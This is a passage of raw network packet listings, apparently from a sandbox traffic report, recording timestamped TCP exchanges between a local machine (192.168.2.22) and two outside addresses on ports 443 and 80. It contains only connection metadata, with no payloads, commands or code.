                                                  Dec 2, 2024 07:25:20.836512089 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.836534977 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.836584091 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.839834929 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.839863062 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.839879990 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.839910030 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.839927912 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.842403889 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.842411995 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.842434883 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.842461109 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.842494011 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.845062971 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.845074892 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.845089912 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.845122099 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.845149994 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.848486900 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.848495007 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.848519087 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.848546982 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.848573923 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.851164103 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.851171017 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.851217985 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.851233006 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.853780031 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.853787899 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.853836060 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.853866100 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.857120991 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.857129097 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.857177019 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.857203960 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.859853029 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.859859943 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.859913111 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.859944105 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.862390995 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.862425089 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.862453938 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.862477064 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.862529039 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.865345001 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.865387917 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.865395069 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.865423918 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.865457058 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.865472078 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.865489006 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.866240025 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.866312027 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.866357088 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.868053913 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.868066072 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.868103981 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.868750095 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.868803024 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.868814945 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.869853973 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.869941950 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.869990110 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.871476889 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.871536016 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.871542931 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.871653080 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.871769905 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.871818066 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.873648882 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.873864889 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.873917103 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.874011040 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.874067068 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.874079943 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.875350952 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.875412941 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.875458956 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.877106905 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.877229929 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.877279997 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.877437115 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.877495050 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.877507925 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.878926039 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.878988028 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.879036903 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.880758047 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.880887985 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.880939960 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.882596016 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.882613897 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.882661104 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.884382963 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.884496927 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.884545088 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.886313915 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.886360884 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.886406898 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.888041019 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.888108969 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.888153076 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.889622927 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.889795065 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.889836073 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.891158104 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.891283989 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.891328096 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.892704964 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.892788887 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.823761940 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.823812962 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.826473951 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.827883959 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.827933073 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.829951048 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.830049992 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.830096006 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.833317041 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.834814072 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.834860086 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.836749077 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.836766005 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.836816072 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.840142965 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.840241909 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.840284109 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.842212915 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.843624115 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.844369888 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.844415903 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.846982002 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.847265005 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.847301006 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.850400925 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.850827932 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.850867033 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.853827953 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.854772091 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.854815006 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.857238054 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.857347012 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.857389927 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.860851049 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.893222094 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.893876076 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.893923998 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.895217896 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.895735979 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.895787001 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.898638010 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.901351929 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.901410103 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.902391911 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.902882099 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.902925968 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.905536890 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.907052994 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.907098055 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.908902884 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.909009933 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.909050941 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.912301064 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.912394047 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.912441969 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.915721893 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.995589018 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.995666027 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.995708942 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.997158051 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.997205019 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.997276068 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.000047922 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.000092030 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.000857115 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.003020048 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.003065109 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.003403902 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.006009102 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.006055117 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.006597042 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.008965969 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.009026051 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.009110928 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.011924028 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.011982918 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.013127089 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.014946938 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.015002012 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.015547037 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.017914057 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.017980099 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.019252062 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.020899057 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.020957947 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.021116018 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.022445917 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.022499084 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.022665024 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.024107933 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.024162054 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.024241924 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.025621891 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.025679111 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.025832891 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.027254105 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.027317047 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.027545929 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.028845072 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.028857946 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.028887987 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.030442953 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.030513048 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.030530930 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.032002926 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.032062054 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.032119036 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.033590078 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.033649921 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.034183025 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.035186052 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.035238028 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.035309076 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.036755085 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.036824942 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.037106991 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.038388968 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.038399935 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.038451910 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.039923906 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.041553020 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.041563988 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.041625977 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.041651964 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.043164015 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.043174982 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.043212891 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.044702053 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.045387030 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.045440912 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.046319008 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.047424078 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.047466993 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.047929049 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.047940016 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.047976971 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.049448013 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.049563885 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.049607992 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.050024986 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.051003933 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.051100016 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.051160097 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.052622080 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.052809000 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.052859068 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.054276943 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.054366112 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.054409981 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.055831909 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.057399035 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.057410002 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.057452917 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.057488918 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.059021950 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.059032917 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.059070110 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.060556889 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.060606003 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.060614109 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.062124014 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.062190056 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.063215017 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.063713074 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.063761950 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.063906908 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.065306902 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.065356970 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.065496922 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.066907883 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.066955090 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.067353964 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.068519115 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.068530083 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.068566084 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.070215940 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.070882082 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.070943117 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.071619034 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.071985960 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.072026014 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.073312044 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.074836969 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.074846029 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.074856997 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.074889898 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.074903965 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.076376915 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.076579094 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.076625109 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.077961922 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.078007936 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.078053951 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.079555988 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.079674006 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.079719067 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.081130028 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.082532883 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.082581997 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.082705021 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.083373070 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.083420992 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.084357023 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.084368944 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.084404945 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.101244926 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.115634918 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.116077900 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.116122961 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.116449118 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.116461992 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.116499901 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.118011951 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.119241953 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.119282007 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.119623899 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.119853020 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.119893074 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.121191978 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.196647882 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.196702957 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.217706919 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.217792034 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.217854023 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.218030930 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.218229055 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.218266964 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.219340086 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.219500065 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.219546080 CET4917480192.168.2.22146.70.113.200
